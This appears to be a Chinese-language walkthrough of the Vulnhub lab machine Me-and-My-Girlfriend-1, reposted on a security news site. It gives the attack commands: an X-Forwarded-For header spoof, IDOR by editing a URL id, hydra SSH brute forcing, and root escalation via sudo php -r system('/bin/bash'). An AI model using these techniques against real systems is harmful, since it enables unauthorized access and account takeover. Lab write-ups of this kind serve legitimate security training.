Vulnhub靶机通关系列(1)Me-and-My-Girlfriend-1

admin 2024年11月27日22:25:58评论4 views字数 570阅读1分54秒阅读模式

为了适应技能大赛的改变,从今天开始会多打一些靶机。。

靶机下载地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

本台靶机考察知识点: 水平越权,SSH端口爆破,sudo回调php提权

1.首先还是nmap探测端口,得知开放80,22,打开80端口发现要伪造xff

X-Forwarded-For:127.0.0.1

2.来到页面可以注册并登陆账号,看url比较奇怪,更改id后的数值发现可以直接水平越权,并且查看源代码拿到密码

Vulnhub靶机通关系列(1)Me-and-My-Girlfriend-1

3.通过burpsuite枚举出5个账号密码,将其收集起来,准备进行ssh爆破

Vulnhub靶机通关系列(1)Me-and-My-Girlfriend-1

4.使用hydra工具 hydra -L ./username.txt -P  ./pass.txt ssh:192.168.19.46得到密码

Vulnhub靶机通关系列(1)Me-and-My-Girlfriend-1

5.ssh [email protected]连上后,find / -name “flag*” 2>/dev/null拿到第一个flag,查看suid提权发现没有可利用的点,使用sudo -l 查看用户可以用哪些超级权限,发现可用php

使用sudo php -r ‘system(“/bin/bash”);’回调php拿到root权限

Vulnhub靶机通关系列(1)Me-and-My-Girlfriend-1

 

 

 

原文始发于微信公众号(飞奔的狸花猫):Vulnhub靶机通关系列(1)Me-and-My-Girlfriend-1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月27日22:25:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub靶机通关系列(1)Me-and-My-Girlfriend-1http://cn-sec.com/archives/2491165.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息